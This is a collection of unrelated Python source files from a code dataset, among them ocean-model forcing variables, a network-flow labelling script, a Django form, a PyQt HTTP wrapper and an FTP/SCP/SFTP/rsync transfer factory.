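    moon.setVelocity(8.4).setAngle(math.pi / 2)   # assumed initial speed and heading
    for _ in range(frames):
        moon.advancePosition(sun)
    moon.drawPlanet()
    return moon.getPosition()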
# EOF for planets | StarcoderdataPython |
97669 | import numpy as np
import redis
import json
import logging
from docopt import docopt
from obnl.core.client import ClientNode
# This doc is used by docopt to make the wrapper callable by command line and gather easily all the given parameters
doc = """>>> IntegrCiTy wrapper command <<<
Usage:
wrapper.py (<host> <name> <init>) [--i=TO_SET... --o=TO_GET... --first --cmd=CMD]
wrapper.py -h | --help
wrapper.py --version
Options
-h --help show this
--version show version
--i parameters to set
--o parameters to get
--first node in sequence's first group
--cmd optional list of commands to run wrapper
"""
class Node(ClientNode):
"""
Node class for the wrapper (model can be called by the container or can be self contained directly in the wrapper)
"""
def __init__(self, host, input_attributes=None, output_attributes=None, is_first=False):
# Implement OBNL client node
super(Node, self).__init__(host, 'obnl_vhost', 'obnl', 'obnl', 'config_file.json',
input_attributes=input_attributes,
output_attributes=output_attributes,
is_first=is_first)
self.redis = redis.StrictRedis(host=host, port=6379, db=0)
# Declare model
self.a = 0
self.b = 0
self.c = None
# Set initial values / model parameters
with open('init_values.json') as json_data:
init_values = json.load(json_data)
for key, val in init_values.items():
setattr(self, key, val)
def step(self, current_time, time_step):
"""
Run a step for the wrapper/model
:param current_time: current simulation time
:param time_step: next time step to run
:return: nothing :)
"""
logging.debug('----- ' + self.name + ' -----')
logging.debug(self.name, 'time_step', time_step, "s")
logging.debug(self.name, 'current_time', current_time - time_step)
logging.debug(self.name, 'inputs', self.input_values)
# Update input attributes and save input attributes and corresponding simulation time step to Redis DB
for key, value in self.input_values.items():
setattr(self, key, value)
self.redis.rpush('IN||' + self.name + '||' + key, getattr(self, key))
self.redis.rpush('IN||' + self.name + '||' + key + '||time', current_time)
# Compute intern state
logging.debug(self.name, "compute new intern state")
self.b = self.a + np.random.choice([-1, 1]) * self.c
# Send updated output attributes
logging.debug(self.name, "outputs", {key: getattr(self, key) for key in self.output_attributes})
for key in self.output_attributes:
self.update_attribute(key, getattr(self, key))
# Save output attributes and corresponding simulation time step to Redis DB
for key in self.output_attributes:
self.redis.rpush('OUT||' + self.name + '||' + key, getattr(self, key))
self.redis.rpush('OUT||' + self.name + '||' + key + '||time', current_time)
if __name__ == "__main__":
args = docopt(doc, version='0.0.1')
node = Node(
host=args['<host>'],
is_first=args['--first'],
input_attributes=args['--i'],
output_attributes=args['--o']
)
node.start()
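# Hedged invocation sketch (host, node name and attribute names are assumed
# example values; docopt expects <host> <name> <init> as positionals):
#   python wrapper.py localhost node_a init_values.json --i a --o b --first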
| StarcoderdataPython |
107271 | '''
Created on Nov 19, 2013
@author: <NAME>
<EMAIL>
Department of Geography, UGA
'''
'''
Create initial table for tweet storing
'''
import dbf
table = dbf.Table("Tweet.dbf","TweetID C(20);TweetText C(200);TweetTime C(30); TweetLat C(30);TweetLon C(30);UserID C(30);UserName C(30);UserLoc C(30); CheckTime C(20)")
table.close() | StarcoderdataPython |
1730688 | <filename>BFM17_POM1D_VrsFnl/src/pom/coupling/ModuleForcing.py
# WARNING THIS IS A TEST VERSION
# (MONTHLY FREQUENCY)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# MODEL BFM - Biogeochemical Flux Model
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
from BFM17_POM1D_VrsFnl.src.BFM.General.ModuleGlobalMem import RLEN
from BFM17_POM1D_VrsFnl.src.pom.phys.POMModule import KB
from decimal import *
import numpy as np
getcontext().prec = 12 # 12-digit precision (ilong)
# MONTHLY SHORTWAVE RADIATION
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# N.B.!
# ALWAYS NEEDED: WHEN THE MODEL IS RUN IN DIAGNOSTIC MODE PROVIDES ONLY PAR TO BFM.
# IN PROGNOSTIC CONTRIBUTES TO THE DEFINITION OF THE TEMPERATURE SURFACE BOUNDARY CONDITION.
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
SWRAD1, SWRAD2 = Decimal(), Decimal()
# SLUX1, SLUX2 = Decimal()
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# N.B.!
# THE FOLLOWING SCALARS ARE USED ONLY WHEN THE MODEL IS RUN IN PROGNOSTIC MODE.
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# MONTHLY LOSS TERM OF THE SURFACE HEAT FLUX
WTSURF1, WTSURF2 = Decimal(), Decimal()
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# N.B.!
# THE FOLLOWING ARE ALWAYS USED.
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# PRESCRIBED T&S PROFILES
TSTAR, SSTAR = np.empty(KB, dtype=float), np.empty(KB, dtype=float)
# MONTHLY WIND STRESS
WSU1, WSU2, WSV1, WSV2 = Decimal(), Decimal(), Decimal(), Decimal()
# MONTHLY SURFACE SALINITY
SSS1, SSS2 = Decimal(), Decimal()
# MONTHLY BOTTOM OXYGEN
O2_b1, O2_b2 = Decimal(), Decimal()
# MONTHLY SURFACE AND BOTTOM NITRATE
NO3_s1, NO3_s2 = Decimal(), Decimal()
NO3_b1, NO3_b2 = Decimal(), Decimal()
# MONTHLY SURFACE AND BOTTOM PHOSPHATE
PO4_s1, PO4_s2 = Decimal(), Decimal()
PO4_b1, PO4_b2 = Decimal(), Decimal()
# MONTHLY SURFACE AMMONIA
NH4_s1, NH4_s2 = Decimal(), Decimal()
# MONTHLY BOTTOM PON GRADIENT
PON_b1, PON_b2 = Decimal(), Decimal()
# MONTHLY SURFACE SILICATE
SIO4_s1, SIO4_s2 = Decimal(), Decimal()
# MONTHLY PROFILES OF INORGANIC SUSPENDED MATTER
ISM1, ISM2 = np.empty(KB, dtype=float), np.empty(KB, dtype=float)
# MONTHLY PROFILES OF T & S
TCLIM1, TCLIM2 = np.empty(KB, dtype=float), np.empty(KB, dtype=float)
SCLIM1, SCLIM2 = np.empty(KB, dtype=float), np.empty(KB, dtype=float)
WCLIM1, WCLIM2 = np.empty(KB, dtype=float), np.empty(KB, dtype=float)
WEDDY1, WEDDY2, WEDDY3, WEDDY4 = (np.empty(KB, dtype=float) for _ in range(4))
SLUX1, QCORR1, QCORR2 = Decimal(), Decimal(), Decimal()
# INTERPOLATORS AND COUNTERS
ICOUNTF, IDOUNTF, IFCHGE, IFDCHGE, IFDINT, IFINT = (Decimal() for _ in range(6))
RATIOF, RATIOD = Decimal(), Decimal()
def FORCING_MANAGER():
from BFM17_POM1D_VrsFnl.src.BFM.General.ModuleGlobalMem import RLEN, ZERO, PI, ONE, NML_OPEN, NML_READ, error_msg_prn
from BFM17_POM1D_VrsFnl.src.BFM.General.ModuleConstants import SEC_PER_DAY
from BFM17_POM1D_VrsFnl.src.pom.phys.POMModule import IDIAGN, DTI, intt, RCP, KB, TF, SF, WUSURF, WVSURF, SWRAD, \
WTSURF, WSSURF, TSURF,SSURF, TB, SB
from BFM17_POM1D_VrsFnl.src.BFM.General.ModuleService import ISM, savef, PO4SURF, NO3SURF, NH4SURF, SIO4SURF, \
PO4BOTT, NO3BOTT, O2BOTT, PONBOTTgrad, WGEN, WEDDY, wind_input, radiance_input, ism_input, Sprofile_input, W_input, \
Tprofile_input, surfNut_input, bottNut_input, Sal_input, Temp_input, heat_input, surfaceS_input
import numpy as np
getcontext().prec = 12 # 12-digit precision (ilong)
# LOOP COUNTER
K = Decimal()
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# LOCAL ARRAYS
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
RLENGTH = Decimal()
# INITIALISATION AND FIRST FORCING READING
# if intt == int(ONE):
| StarcoderdataPython |
188053 | <filename>homoeditdistance/demonstration.py<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Usage demonstration for the homoeditdistance package."""
import sys
import argparse
from homoeditdistance import homoEditDistance, backtrack, assemblePaths
def get_parser():
"""
Returns the argument parser used to parse the command line used for invoking the demo application.
Used internally, exists solely for readability.
:return: The ArgumentParser.
"""
parser = argparse.ArgumentParser(description='Given two strings, find their homo-edit distance',
fromfile_prefix_chars='@')
parser.add_argument('-s', '--string1', required=True,
help='first string. Use quotation marks around your string (e.g. "STRING")'
'for the empty string or strings with special characters')
parser.add_argument('-t', '--string2', required=True,
help='second string')
parser.add_argument('-a', '--all', action='store_true', default=False, required=False,
help='show all optimal subsequences')
parser.add_argument('-b', '--backtrace', action='store_true', default=False, required=False,
help='print transformation steps')
return parser
def run(args):
"""
    The main function of the demo application.
:param args: The arguments provided by the user and pre-parsed by our argument parser.
"""
s, t = args.string1, args.string2
requiredBacktrackLevel = 0
if args.backtrace:
requiredBacktrackLevel = 2
elif args.all:
requiredBacktrackLevel = 1
result = homoEditDistance(s, t, requiredBacktrackLevel)
print('The homo-edit distance between {} and {} is {}\n'.format(
s if s != '' else 'the empty string',
t if t != '' else 'the empty string',
result['hed']
)
)
if args.all and args.backtrace:
print('The following optimal subsequences were found, and obtained using the listed operations:')
subs = backtrack(result['bt'], s, t)
txt = dict(assemblePaths(result['bt'], s, t, result['zbt']))
for sup in set(subs):
print()
if sup == '':
print('empty string')
else:
print(sup)
print(txt[sup].strip())
elif args.all:
print('The following optimal subsequences were found:')
subs = backtrack(result['bt'], s, t)
for sup in set(subs):
print(sup, end=' ')
elif args.backtrace:
print('Detailed Backtracking for one possible subsequence:')
txt = dict(assemblePaths(result['bt'], s, t, result['zbt']))
key = next(iter(txt))
print(key)
print(txt[key])
def main():
"""Run the demo."""
run(get_parser().parse_args(sys.argv[1:]))
| StarcoderdataPython |
1741439 | import os
import zipfile
import shutil
import walk
def Unpack(set_pack, archive_name):
archive_name = set_pack[0] + "/" + archive_name
z = zipfile.ZipFile(archive_name, 'r')
z.extractall(set_pack[1])
z.close()
def Pack(set_pack, archive_name):
with zipfile.ZipFile(set_pack[0] + "/" + archive_name, 'w') as myzip:
myzip.write(set_pack[0] + "/") | StarcoderdataPython |
3372492 | <filename>datasets/data-sets/voice-assistant/annotate-data-flows.py<gh_stars>0
#!/usr/bin/env python3
import os
import sys
import json
arguments = len(sys.argv)
src_directory = "."
dst_directory = "../../annotated-data-sets/voice-assistant/"
# read all files in subdirectories
for root, dirs, files in os.walk(src_directory):
# Skip parent directories
if dirs:
continue
for file in files:
# open files in src and dst directories
with open(root+"/"+file,encoding="utf-8", mode="r") as flows, open(dst_directory+root[2:]+"/"+file,encoding="utf-8",mode="w+") as dst_file:
for flow in flows:
# anotate specific flows
fields = json.loads(flow)
try:
if fields["dp"] == 8009 and fields["da"] == "192.168.3.110":
fields["flow_type"] = "Local Client TCP Scan"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sa"] == "192.168.3.109" or fields["sa"] == "192.168.3.164":
fields["flow_type"] = "Local Client Communication"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 67 and fields["dp"] == 68:
fields["flow_type"] = "DHCP"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 68 and fields["dp"] == 67:
fields["flow_type"] = "DHCP (Partial)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 53:
fields["flow_type"] = "DNS (Google Services)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == None and fields["dp"] == None and fields["da"].startswith("2"):
fields["flow_type"] = "Membership Report Group"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == None and fields["dp"] == None and not fields["da"].startswith("2"):
fields["flow_type"] = "ICMP"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 5353 and fields["dp"] == 5353:
fields["flow_type"] = "MDNS"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["dp"] == 5228:
fields["flow_type"] = "TLS (Mtalk Service)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 5228:
fields["flow_type"] = "TLS (Mtalk Service - Missing TLS Connectivity Establishment)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["dp"] == 443:
fields["flow_type"] = "TLS (Google Services)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 443:
fields["flow_type"] = "TLS (Google Services - Missing TLS Connectivity Establishment)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["dp"] == 123:
fields["flow_type"] = "NTP"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["dp"] == 80:
fields["flow_type"] = "HTTP (Connectivity Check)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 80:
fields["flow_type"] = "HTTP (Connectivity Check - Missing Flow Beginning)"
json.dump(fields,dst_file)
print(file=dst_file)
else:
fields["flow_type"] = "Unknown"
json.dump(fields,dst_file)
print(file=dst_file)
except Exception as e:
fields["flow_type"] = "Flow Error"
json.dump(fields,dst_file)
print(file=dst_file)
| StarcoderdataPython |
4819843 | from setuptools import setup
from setuptools import find_packages
setup(name='json-test',
packages = find_packages(),
version='0.1',
description='A python library for assisting you in writing tests against a JSON structure.',
url='https://github.com/inkmonk/json-test',
author='Sibi',
author_email='<EMAIL>',
license='BSD3',
zip_safe=False)
| StarcoderdataPython |
187293 | from osrf_pycommon.process_utils import asyncio
from osrf_pycommon.process_utils.async_execute_process import async_execute_process
from osrf_pycommon.process_utils import get_loop
# allow module to be importable for --cover-inclusive
try:
from osrf_pycommon.process_utils.async_execute_process_trollius import From
except ImportError:
TROLLIUS_FOUND = False
else:
TROLLIUS_FOUND = True
from osrf_pycommon.process_utils.async_execute_process_trollius import Return
from .impl_aep_protocol import create_protocol
loop = get_loop()
@asyncio.coroutine
def run(cmd, **kwargs):
transport, protocol = yield From(async_execute_process(
create_protocol(), cmd, **kwargs))
retcode = yield asyncio.From(protocol.complete)
raise Return(protocol.stdout_buffer, protocol.stderr_buffer,
retcode)
| StarcoderdataPython |
116022 | from django import forms
from .models import Job
class JobForm(forms.ModelForm):
class Meta:
model = Job
fields = ('publisher', 'company_name', 'title', 'job_type', 'location', 'description', 'post_until',
'is_active', 'apply_link')
widgets = {
'publisher': forms.TextInput(attrs={'class': 'form-control', 'value': '', 'id': 'currentUser',
'type': 'hidden'}),
'company_name': forms.TextInput(attrs={'class': 'form-control'}),
'title': forms.TextInput(attrs={'class': 'form-control'}),
'job_type': forms.Select(attrs={'class': 'form-control'}),
'location': forms.Select(attrs={'class': 'form-control'}),
'description': forms.Textarea(attrs={'class': 'form-control'}),
'post_until': forms.SelectDateWidget(attrs={'class': 'form-control'}),
            'is_active': forms.CheckboxInput(attrs={'class': 'form-check-input'}),
'apply_link': forms.URLInput(attrs={'class': 'form-control'})
}
| StarcoderdataPython |
3249410 | <gh_stars>0
"""QHttp module."""
from PyQt5 import QtCore, QtNetwork
from typing import Union, Optional, cast, Dict, List, Any
from pineboolib.core import decorators
class QHttpRequest(object):
"""QHttpRequest class."""
_valid: bool
_major_ver: int
_minor_ver: int
_values: Dict[str, Any]
_id: int
ID: int = 0
def __init__(self):
"""Initialize."""
self._id = self.ID
print("* ID", self._id)
        QHttpRequest.ID += 1
self._values = {}
self._major_ver = 1
self._minor_ver = 1
# self.setValue("Connection", "keep-alive")
def majorVersion(self) -> int:
"""Return major version."""
return self._major_ver
def minorVersion(self) -> int:
"""Return minor version."""
return self._minor_ver
def parse(self, text_: str) -> bool:
"""Parse text."""
list_: List[str] = []
pos = text_.find("\n")
if pos > 0 and text_[pos - 1] == "\r":
list_ = text_.strip().split("\r\n")
else:
list_ = text_.strip().split("\n")
if not list_:
return True
lines_: List[str] = []
for it in list_:
if it[0].isspace():
if lines_:
lines_[len(lines_) - 1] += " "
lines_[len(lines_) - 1] += it.strip()
else:
lines_.append(it)
for i in range(len(lines_)):
if not self.parseLine(lines_[i], i):
self._valid = False
return False
return True
def keys(self) -> str:
"""Return keys stringlist."""
return ",".join(list(self._values.keys()))
def setValue(self, key_: str, value_: Any):
"""Set key to dict."""
self._values[key_.lower()] = value_
def value(self, key_: str):
"""Return value."""
if key_.lower() in self._values.keys():
return self._values[key_.lower()]
raise ValueError("%s not found in values!" % key_)
def removeValue(self, key_: str):
"""Remove key from dict."""
k_ = key_.lower()
if k_ in self._values.keys():
self._values[k_] = None
del self._values[k_]
def setValid(self, valid_: bool) -> None:
"""Set if is valid."""
self._valid = valid_
def parseLine(self, line_: str, num_: int = 0) -> bool:
"""Parse line."""
if line_.find(":") == -1:
return False
else:
list_ = line_.split(":")
self._values[list_[0].lower()] = list_[1]
return True
def __str__(self):
"""Return string value."""
if not self._valid:
return ""
ret_ = ""
        for k, v in self._values.items():
ret_ += "%s:%s\r\n" % (k, v)
return ret_
def hasContentLength(self):
"""Return if content length is avaliable."""
return "content-length" in self._values.keys()
def contentLenth(self) -> int:
"""Return content length."""
if "content-length" in self._values.keys():
return self._values["content-length"]
else:
return 0
def setContentLength(self, length_: int) -> None:
"""Set content length."""
self._values["content-length"] = length_
def hasContentType(self):
"""Return if has content type."""
return "content-type" in self._values.keys()
def contentType(self) -> str:
"""Return content type."""
if "content-type" in self._values.keys():
return self._values["content-type"]
else:
return ""
def setContentType(self, type_: str) -> None:
"""Set content type."""
self._values["content-type"] = type_
class QHttpResponseHeader(QHttpRequest):
"""QHttpRespnse class."""
_status_code: int
_reason_phr: Optional[str]
def __init__(self, *args):
"""Initialize."""
super().__init__()
self.setValid(False)
self._status_code = 0
self._reason_phr = ""
if len(args) > 1:
self._status_code = args[0]
self._reason_phr = args[1] or ""
if len(args) > 2:
self._major_ver = args[2]
if len(args) > 3:
self._minor_ver = args[3]
else:
self.parse(args[0])
def setStatusLine(self, code_: int, text_: Optional[str] = None, major_ver_=1, minor_ver_=1):
"""Set status line."""
self.setValid(True)
self._status_code = code_
self._reason_phr = text_
self._major_ver = major_ver_
self._minor_ver = minor_ver_
def statusCode(self) -> int:
"""Return status code."""
return self._status_code
def reasonPhrase(self) -> str:
"""Return reason."""
return self._reason_phr or ""
def parseLine(self, line_: str, number_: int = 0) -> bool:
"""Parse Line."""
if number_ != 0:
return super().parseLine(line_)
l_ = line_.strip()
if len(l_) < 10:
return False
if (
l_[0:5] == "HTTP/"
and l_[5].isdigit()
and l_[6] == "."
and l_[7].isdigit()
and l_[8] == "."
and l_[9].isdigit()
):
self._major_ver = int(l_[5]) - 0
self._minor_ver = int(l_[7]) - 0
pos = l_[9:].find(" ")
if pos > -1:
self._reason_phr = l_[9 + pos :]
self._status_code = int(l_[9 : 9 + pos])
else:
self._status_code = int(l_[9:])
self._reason_phr = ""
else:
return False
return True
def __str__(self):
"""Return str value."""
return "HTTP/%s.%s %s %s\r\n%s\r\n" % (
self._major_ver,
self._minor_ver,
self._status_code,
self._reason_phr,
str(super()),
)
class QHttpRequestHeader(QHttpRequest):
"""QHttpRequestHeader class."""
_method: str
_path: str
def __init__(self, *args):
"""Initialize."""
super().__init__()
self.setValid(False)
self._method = "POS"
if len(args) > 1:
self._method = args[0]
self._path = args[1]
if len(args) > 2:
self._major_ver: int = args[2]
if len(args) > 3:
self._minor_ver: int = args[3]
elif isinstance(args[0], str):
self.parse(args[0])
else:
self = args[0]
def setRequest(self, method_: str, path_: str, major_ver: int = 1, minor_ver=1):
"""Set request."""
self.setValid(True)
self._method = method_
self._path = path_
self._major_ver = major_ver
self._minor_ver = minor_ver
def method(self) -> str:
"""Return method."""
return self._method
def path(self) -> str:
"""Return path."""
return self._path
def __str__(self):
"""Return string value."""
return "%s %s HTTP/%s.%s\r\n%s\r\n" % (
self._method,
self._path,
self._major_ver,
self._minor_ver,
str(super()),
)
class HttpState(QtCore.QObject):
"""HttpState class."""
Unconnected = 0
HostLookup = 1
Connecting = 2
Sending = 3
Reading = 4
Connected = 5
Closing = 6
class HttpError(QtCore.QObject):
"""HttpError class."""
NoError = 0
UnknownError = 1
HostNotFound = 2
ConnectionRefused = 3
UnexpectedClose = 4
InvalidResponseHeader = 5
WrongContentLength = 6
Aborted = 7
class QHttp(HttpState, HttpError):
"""QHttp class."""
stateChanged = QtCore.pyqtSignal(int)
dataSendProgress = QtCore.pyqtSignal(int, int)
dataReadProgress = QtCore.pyqtSignal(int, int)
requestStarted = QtCore.pyqtSignal(int)
requestFinished = QtCore.pyqtSignal(int, bool)
responseHeaderReceived = QtCore.pyqtSignal(QHttpResponseHeader)
done = QtCore.pyqtSignal(bool)
readyRead = QtCore.pyqtSignal(QHttpResponseHeader)
_manager: QtNetwork.QNetworkAccessManager
_reply: QtNetwork.QNetworkReply
_state: int
_error: int
_host: str
_port: int
_name: str
_error_str: str
_parent: Optional[QtCore.QObject]
_operation: int
_data: Optional[QtCore.QBuffer]
_current_id: int
def __init__(self, *args):
"""Initialize."""
super().__init__()
self._state = self.Unconnected
self._error = self.NoError
self._data = None
if len(args) == 2:
self.initialize2(args[0], args[1])
elif len(args) == 4:
self.initialize1(args[0], args[1], args[2], args[3])
self._manager = QtNetwork.QNetworkAccessManager()
# self._request = QtNetwork.QNetworkRequest()
cast(QtCore.pyqtSignal, self._manager.finished).connect(self._slotNetworkFinished)
self._error_str = self.tr("Unknown error")
def initialize1(
self,
host_name: str,
port_: int = 80,
parent_: Optional[QtCore.QObject] = None,
name_: Optional[str] = None,
):
"""Initialize with kwars."""
self._host = "%s:%s" % (host_name, port_)
# self._port = port_
self._parent = parent_
self._name = name_ or ""
def initialize2(self, parent_: QtCore.QObject, name_: str = ""):
"""Initialize with args."""
self._parent = parent_
self._name = name_
def setHost(self, name_: str, port_: int = 80) -> None:
"""Set host."""
self._name = "%s:%s" % (name_, port_)
# self._port = port_
def get(self, full_path: str) -> None:
"""Get data from url."""
_request = QHttpRequestHeader("GET", full_path)
_request.setValue("Connection", "Keep-Alive")
self.request(_request)
# self._data = QtCore.QBuffer()
# _request = QtNetwork.QNetworkRequest()
# _request.setUrl(QtCore.QUrl(path_))
# self._state = self.Connecting
# self._reply = self._manager.get(_request)
# self._state = self.Connected
# cast(QtCore.pyqtSignal, self._reply.downloadProgress).connect(self._slotNetworkProgressRead)
def post(self, full_path: str, data_: Union[QtCore.QIODevice, QtCore.QByteArray]) -> None:
"""Send data to url."""
_request = QHttpRequestHeader("POST", full_path)
_request.setValue("Connection", "Keep-Alive")
self.request(_request, data_)
# self._data = QtCore.QBuffer()
# _request = QtNetwork.QNetworkRequest()
# _request.setUrl(QtCore.QUrl(path_))
# self._state = self.Connecting
# self._reply = self._manager.post(_request, data_)
# self._state = self.Connected
# cast(QtCore.pyqtSignal, self._reply.downloadProgress).connect(self._slotNetworkProgressRead)
@decorators.NotImplementedWarn
def head(self, path_: str) -> None:
"""Set head."""
return None
# header = QHttpRequestHeader("HEAD", path_)
# header.setValue("Connection", "Keep-Alive")
# return self.request()
def request(
self,
request_header: QHttpRequestHeader,
data_: Optional[Union[QtCore.QIODevice, QtCore.QByteArray]] = None,
buffer_: Optional[QtCore.QBuffer] = None,
) -> None:
"""Send request."""
self._data = None
del self._data
if buffer_ is None:
buffer_ = QtCore.QBuffer()
_request = QtNetwork.QNetworkRequest()
_tipo = request_header.method().lower()
# if request_header.hasContentType():
# _request.setHeader(
# QtNetwork.QNetworkRequest.ContentTypeHeader, request_header.contentType()
# )
url_ = QtCore.QUrl(request_header.path())
for k in request_header._values.keys():
if k != "host":
_request.setRawHeader(
str.encode(k), str.encode(str(request_header._values[k]).lower())
)
else:
url_ = QtCore.QUrl("%s/%s" % (request_header.value("host"), request_header.path()))
if not url_.isValid():
raise Exception("url_ is not a valid URL!")
_request.setUrl(url_)
method_ = getattr(self._manager, _tipo, None)
self._data = buffer_
if self._data is not None:
self._data.open(QtCore.QIODevice.ReadWrite)
self._state = self.Connecting
if _tipo == "get":
self._reply = method_(_request)
else:
self._reply = method_(_request, data_)
cast(QtCore.pyqtSignal, self._reply.downloadProgress).connect(self._slotNetworkProgressRead)
cast(QtCore.pyqtSignal, self._reply.uploadProgress).connect(self._slotNetworkProgressSend)
self._state = self.Connected
self._current_id = request_header._id
self.requestStarted.emit(request_header._id)
@decorators.NotImplementedWarn
def closeConnection(self) -> None:
"""Close Connection."""
self._state = self.Closing
self._reply.close()
def bytesAvalible(self) -> int:
"""Return bytes avalible."""
if self._data is not None:
return self._data.size()
else:
return self._reply.size()
@decorators.NotImplementedWarn
def readBlock(self, data_: str, max_length_: int) -> None:
"""Read block."""
pass
def readAll(self) -> QtCore.QByteArray:
"""Read all data."""
if self._data is not None:
return self._data.readAll()
else:
return self._reply.readAll()
def currentId(self) -> int:
"""Return id."""
return self._current_id
@decorators.NotImplementedWarn
def currentSourceDevice(self) -> QtCore.QIODevice:
"""Return current source device."""
pass
@decorators.NotImplementedWarn
def currentDestinationDevice(self) -> QtCore.QIODevice:
"""Return current destination device."""
pass
@decorators.NotImplementedWarn
def currentRequest(self) -> None:
"""Return current request."""
return None
@decorators.NotImplementedWarn
def hasPendingRequests(self) -> bool:
"""Return if pendidng reuqest exists."""
return True
@decorators.NotImplementedWarn
def clearPendingRequests(self) -> None:
"""Clear pending requests."""
pass
# for request_ in list(self._pending_request):
# self._pending_request.remove(request_)
def setState(self, state_: int) -> None:
"""Set state."""
self._state = state_
def state(self) -> int:
"""Return state."""
return self._state
def error(self) -> int:
"""Return error."""
return cast(int, self._reply.error())
def errorString(self) -> str:
"""Return error string."""
return self._reply.errorString()
def _slotNetworkFinished(self) -> None:
"""Send done signal."""
self._state = self.Closing
# sender = self.sender()
error_ = True
if self._error == self.NoError:
error_ = False
self.done.emit(error_)
self.requestFinished.emit(0, error_)
self._state = self.Unconnected
def _slotNetworkProgressRead(self, b_done: int, b_total: int) -> None:
"""Send done signal."""
if self._reply is None:
raise Exception("No reply in progress")
self._state = self.Reading
self.dataReadProgress.emit(b_done, b_total)
# self.dataSendProgress.emit(b_done, b_total)
if self._data is not None:
data_ = self._reply.readAll()
self._data.write(data_)
else:
self.readyRead.emit()
def _slotNetworkProgressSend(self, b_done: int, b_total: int) -> None:
"""Send done signal."""
if self._reply is None:
raise Exception("No reply in progress")
self._state = self.Sending
# self.dataReadProgress.emit(b_done, b_total)
self.dataSendProgress.emit(b_done, b_total)
if self._data is not None:
data_ = self._reply.readAll()
self._data.write(data_)
else:
self.readyRead.emit()
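# Illustrative sketch (an assumption, not part of the original module): build a
# request header the same way QHttp.get() does internally and inspect it.
if __name__ == "__main__":
    _hdr = QHttpRequestHeader("GET", "http://www.example.com/")
    _hdr.setValue("Connection", "Keep-Alive")
    print(_hdr.method(), _hdr.path(), "->", _hdr.keys())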
| StarcoderdataPython |
1704596 | <gh_stars>1-10
from transferfile.sftp import Sftp
from transferfile.scp import Scp
from transferfile.ftp import Ftp
from transferfile.rsync import Rsync
class TransferFactory(object):
@classmethod
def create(cls, type, host, username, password=None, port=None, **kwargs):
if type.lower() == "ftp":
return Ftp(host, username, password, port, **kwargs)
elif type.lower() == "scp":
return Scp(host, username, password, port, **kwargs)
elif type.lower() == "sftp":
return Sftp(host, username, password, port, **kwargs)
elif type.lower() == "rsync":
return Rsync(host, username, **kwargs)
else:
raise Exception(f"Unkonw transfer type: {type}")
| StarcoderdataPython |
123084 | # -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2019, 2020 <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
